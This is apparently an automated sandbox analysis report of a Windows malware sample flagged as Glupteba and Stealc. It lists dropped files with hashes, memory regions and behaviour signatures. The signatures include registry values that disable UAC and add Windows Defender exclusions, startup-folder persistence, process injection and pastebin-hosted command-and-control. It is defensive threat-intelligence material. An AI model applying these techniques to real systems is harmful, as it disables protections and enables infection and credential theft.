memory/4988-127-0x00000000749A0000-0x0000000075150000-memory.dmp
memory/3420-135-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1ag.0.exe
| MD5 | 77d761b9bf240b7dc67c06208272e05e |
| SHA1 | fb5682433d43c10333a5d368047ba61ab7f4d14f |
| SHA256 | 492f3d1cde4e25da81e94ceeb7cb8469740db841bf7158ad3ebed11ef73277f0 |
| SHA512 | 7314da44c30e98d647050e1db32030fb9dbdb18c1a899cccaec0337b4ecda5a53fb4e63e61780a6cf4059066bd5e55c9e426efa525ff79eed8d5a01f8488f76c |
memory/4812-125-0x0000000000400000-0x000000000046D000-memory.dmp
memory/3420-143-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
memory/4988-147-0x0000000002C20000-0x0000000004C20000-memory.dmp
memory/3420-145-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
memory/3420-146-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
memory/3420-148-0x00007FFD00000000-0x00007FFD00002000-memory.dmp
memory/3420-150-0x00007FFD09F30000-0x00007FFD0A1F9000-memory.dmp
memory/4812-151-0x0000000000400000-0x000000000046D000-memory.dmp
memory/3420-152-0x00007FFD00030000-0x00007FFD00031000-memory.dmp
memory/3420-149-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
memory/3420-153-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
memory/3420-154-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
C:\Users\Admin\Pictures\LfewfClIhATqHqW1CxsJIhoA.exe
| MD5 | ac8e41a86e7f4cd0fa7d8b7012b87547 |
| SHA1 | d702aebf8476ff002f351396a3c436af29f78033 |
| SHA256 | 50cf2a556894e3d7c421941fe180895c1a41fea6a3606957aa22a0b9ea8ca570 |
| SHA512 | b03a6d332b18a82045ca906d9d6f51948b58b224657971d0d6980e8be1f688b28745737739f7443c34f8055fdd93d44cc4ddda34605d31c13086760a9810c9c1 |
memory/3380-167-0x00000000749A0000-0x0000000075150000-memory.dmp
memory/3420-172-0x00007FFD0B280000-0x00007FFD0B33E000-memory.dmp
memory/1672-174-0x0000000000400000-0x0000000000B0E000-memory.dmp
memory/3420-185-0x00007FFD09F30000-0x00007FFD0A1F9000-memory.dmp
memory/820-189-0x0000000000B30000-0x0000000000B57000-memory.dmp
memory/820-194-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/3420-195-0x00007FFD0C1B0000-0x00007FFD0C3A5000-memory.dmp
memory/2696-196-0x0000000000400000-0x0000000000ED4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_240328125929429888.dll
| MD5 | 2c8ab707b79399f1cbaf2cd17003d614 |
| SHA1 | 034bd6bbd7123627ca202b6b35b9018261fc03d5 |
| SHA256 | c8cbcc07e14d8e019e5927126fb5ff30ec1d77f9f351d5738b73c228f02eaede |
| SHA512 | d0f559744068666b3d3cfe9db4ea00ee40a5cc9ab70dfa095c3cbb19dd2fff13746db1bec814ce4faff6df6ebaaa39af62e7e55dd43bea5be6ef356a9c127888 |
memory/820-187-0x0000000000D70000-0x0000000000E70000-memory.dmp
memory/1556-186-0x0000000002AE0000-0x0000000002EDB000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/3380-205-0x0000000002B10000-0x0000000002B20000-memory.dmp
memory/2772-204-0x0000000000400000-0x0000000000ED4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 42bedf710b88912bd657522d213a4faa |
| SHA1 | 99131938c0cb90fcc8648caf086dc0e6f0f2223e |
| SHA256 | ce4342df7c203496aca5a35d8ebd74ff95c6a3e1dfee371b6afb42489a96dde1 |
| SHA512 | 3cd742efa28cc7146a1de1eab0c145790b7f45cf8030abba7dc61c8e340507273ccf514d99cb5c9d5ed58f925ca71dc15699b74c8147cc6af594bea754dd7e0d |
C:\Users\Admin\AppData\Local\Temp\u1ag.1.exe
| MD5 | eee5ddcffbed16222cac0a1b4e2e466e |
| SHA1 | 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5 |
| SHA256 | 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54 |
| SHA512 | 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc |
memory/4988-210-0x00000000749A0000-0x0000000075150000-memory.dmp
memory/3420-156-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
memory/1556-155-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/3420-239-0x00007FF6A63E0000-0x00007FF6A6E41000-memory.dmp
memory/1672-238-0x0000000000400000-0x0000000000B0E000-memory.dmp
memory/1556-241-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/4812-240-0x0000000003610000-0x0000000003A10000-memory.dmp
memory/820-256-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/820-278-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/4812-280-0x0000000003610000-0x0000000003A10000-memory.dmp
memory/2696-281-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/4956-279-0x0000000000400000-0x0000000000930000-memory.dmp
C:\Users\Admin\Pictures\5TVfzHVntQFq0XimVhZ7m8WF.exe
| MD5 | fd0048f4e2d30786133d001b54f4a72f |
| SHA1 | a7135f8891dc1e09d66bd4fc8e06eca519dcdf49 |
| SHA256 | c79aae6d95db14bf3827cb783cd7bf4354f1971af2e55d94a83b752080f9aae0 |
| SHA512 | 58dfbcd6eeead17b91b27b65588737a1c61485a25a5a730cab60defc3a629b4dd8d45c635b2c21376a1145122bc95d500aab5628865d5af3d563254aa7cf5bef |
memory/2772-310-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/4812-321-0x00000000771B0000-0x00000000773C5000-memory.dmp
memory/5568-325-0x00000000010D0000-0x00000000010D9000-memory.dmp
memory/1556-331-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/5568-332-0x0000000002B70000-0x0000000002F70000-memory.dmp
memory/820-333-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/4956-340-0x0000000000400000-0x0000000000930000-memory.dmp
memory/4956-342-0x0000000000A30000-0x0000000000A31000-memory.dmp
memory/5568-345-0x00000000771B0000-0x00000000773C5000-memory.dmp
memory/5568-346-0x0000000002B70000-0x0000000002F70000-memory.dmp
memory/4812-344-0x0000000003610000-0x0000000003A10000-memory.dmp
memory/5568-349-0x0000000002B70000-0x0000000002F70000-memory.dmp
memory/5568-341-0x00007FFD0C1B0000-0x00007FFD0C3A5000-memory.dmp
memory/4812-304-0x00007FFD0C1B0000-0x00007FFD0C3A5000-memory.dmp
memory/5568-352-0x0000000002B70000-0x0000000002F70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS6EB3.tmp\Install.exe
| MD5 | ccdc5c743b6031e977a71cf919c0db7e |
| SHA1 | f9e399475e158c6f2ea8ca2c991ffb37ba89ac30 |
| SHA256 | f08ebffa05fd0fee031986a37356aa91c55735e61e573e2005e705125192c44e |
| SHA512 | f802cf236f75924271cafffd1be7319f2d1eaa26eecabc117a066f61a35c2acbbdcecf8bd93931ed61811b760a92695a4e2c291b5e81104bce1608d62ebee9f0 |
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
| SHA512 | 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2 |
C:\Users\Admin\AppData\Local\Temp\7zS8AD6.tmp\Install.exe
| MD5 | b119ea556def66eaa9f751a650b45af0 |
| SHA1 | daf3fa0325b110183d0a233b4b0d1875f0b49ca8 |
| SHA256 | 53c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4 |
| SHA512 | 08dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4 |
memory/5864-367-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/6040-369-0x00000000028F0000-0x0000000002926000-memory.dmp
memory/2696-372-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2772-373-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/1556-375-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/820-376-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/2696-378-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/6032-388-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/6040-389-0x00000000749A0000-0x0000000075150000-memory.dmp
memory/6032-391-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/6040-390-0x0000000004F90000-0x0000000004FA0000-memory.dmp
memory/6048-392-0x00000000022A0000-0x00000000022B0000-memory.dmp
memory/6048-393-0x00000000749A0000-0x0000000075150000-memory.dmp
memory/6032-394-0x00000000749A0000-0x0000000075150000-memory.dmp
memory/6040-401-0x00000000055D0000-0x0000000005BF8000-memory.dmp
memory/6040-407-0x0000000005460000-0x0000000005482000-memory.dmp
memory/6032-408-0x0000000005810000-0x0000000005876000-memory.dmp
memory/6048-414-0x00000000055E0000-0x0000000005646000-memory.dmp
memory/6048-437-0x0000000005820000-0x0000000005B74000-memory.dmp
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
memory/2696-484-0x0000000002C10000-0x0000000003013000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\opera_package
| MD5 | 856c0e24f5ee9715ee77bd4fef0995ae |
| SHA1 | 02b109c418bfdee0fc725faa35f8c45ae0725929 |
| SHA256 | 74e4528ae1db501f4f5f714aead1a052b8d20cf30167ca6218f5718601e85ff1 |
| SHA512 | 242d571acb0b2c35a7272a3e739ab707242cbe17109dc14bc86de38a238238539f867842ea242ba4122f657e033abe4210c107582bbf49ab47f0e9c267e6f6ff |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Temp\HDGDHCGCBK.exe
| MD5 | fe380780b5c35bd6d54541791151c2be |
| SHA1 | 7fe3a583cf91474c733f85cebf3c857682e269e1 |
| SHA256 | b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53 |
| SHA512 | ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\additional_file0.tmp
| MD5 | 20d293b9bf23403179ca48086ba88867 |
| SHA1 | dedf311108f607a387d486d812514a2defbd1b9e |
| SHA256 | fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348 |
| SHA512 | 5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\dbghelp.dll
| MD5 | 925ea07f594d3fce3f73ede370d92ef7 |
| SHA1 | f67ea921368c288a9d3728158c3f80213d89d7c2 |
| SHA256 | 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9 |
| SHA512 | a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\dbgcore.dll
| MD5 | 8b6f64e5d3a608b434079e50a1277913 |
| SHA1 | 03f431fabf1c99a48b449099455c1575893d9f32 |
| SHA256 | 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2 |
| SHA512 | c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe
| MD5 | b3f05009b53af6435e86cfd939717e82 |
| SHA1 | 770877e7c5f03e8d684984fe430bdfcc2cf41b26 |
| SHA256 | 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7 |
| SHA512 | d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 87ff296944a07ddf7ebcb4fad948257b |
| SHA1 | 9824cf38e910934f9678a4ccb5609e86f6d9d704 |
| SHA256 | f34fda3a16957ad62691c8d3c0d79f276715feae8a9d9c9aaf77d50317a8646b |
| SHA512 | c057356bfe7c6abdf312fbdb470c5b3c01b5aa089677f397038b6cdaa3ab978174f01f5ce90ec86f02d27ab5590cfa54c11d72a8433048bbaf2e4a98b0069b07 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | a6ea7bfcd3aac150c0caef765cb52281 |
| SHA1 | 037dc22c46a0eb0b9ad4c74088129e387cffe96b |
| SHA256 | f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9 |
| SHA512 | c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | d4fb70f520e1f56b44239872747c434d |
| SHA1 | 7daef2e9f01d6ee2f9525e3ab1062b45acc842d0 |
| SHA256 | dce70b0ae042291a8770b82889c55ccd70a32db06a9d3c3a0306010f0770de03 |
| SHA512 | 0ab3219cb499cedcf8a761ce39b41e885bb321f289a6b2a8ad6504032078a56a6df20a87eb80e2593a200436681d7415bdd6c580aa96ee63735423537f65d836 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 8f0d36dbc8bc08a8d7733bbdcbf3f5a4 |
| SHA1 | 87b0b09615c82e4cccb5ed9aa2c44010f8697ca1 |
| SHA256 | d5f96c5aa20643acb6817eae3cbae657097134ba066843ed05bdc0244921a7dc |
| SHA512 | 1dbe952266c33b6182590699663db061ab7fc0aab2af8293eeac6f568cebb0f001fb7f9d107404154b1a28fc283924848d3ad3767d1a7a2f1fc151d20226c8e2 |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 8b8cba39d9205d72aa6c2fee010148ab |
| SHA1 | 875824af7b71abc5128cec8ccd8fc8653d0116df |
| SHA256 | 84c8c0ab0cdb270d82f09ec6642fc8374955398e5cb2beb62de5b353de5971f5 |
| SHA512 | 991d13a8af7154c38c4c4156181e5963c05fce52ec480bc23aa8b060b0669a23f220ac04880d463cd1ac86588a2ab3d28132a8ef8b23e56e70fa8a1e7c29341d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-28 12:58
Reported
2024-03-28 13:01
Platform
win11-20240221-en
Max time kernel
22s
Max time network
127s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\JKmxMN5yf0G2zr5mnTHQQ9Fl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\JKmxMN5yf0G2zr5mnTHQQ9Fl.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Un2VhUJSWbR7nQ6JG7z0Lcpc.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hhaWTbqC2boQb7tuRU6Ft8AX.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HpkRLmKhdXRrqHCByLX776WS.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x48GPrn2dqurbao391IG7xg7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6gcnqQqKFAkFTsX7IFexu0hx.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wXc71diE3dviCBIwEJ6aFeV8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQmTfc8RBdhcKdhn4nMoiO8e.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b4OGKwMGTs4TnwanrR8YBdSp.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\JKmxMN5yf0G2zr5mnTHQQ9Fl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\o0fUweQaCmP5EETHVw9DPj7B.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\4bUKiDXk0lDQoPl3ZL2UDwUm.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\XSX7m3JwRIZEHyt8F6miZR9p.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\7pGISczfho5bZU7Ugq67fpTp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\aGmWABia79Ul6yjhtbj0YJko.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1792 set thread context of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
| PID 2028 set thread context of 3308 | N/A | C:\Users\Admin\Pictures\7pGISczfho5bZU7Ugq67fpTp.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
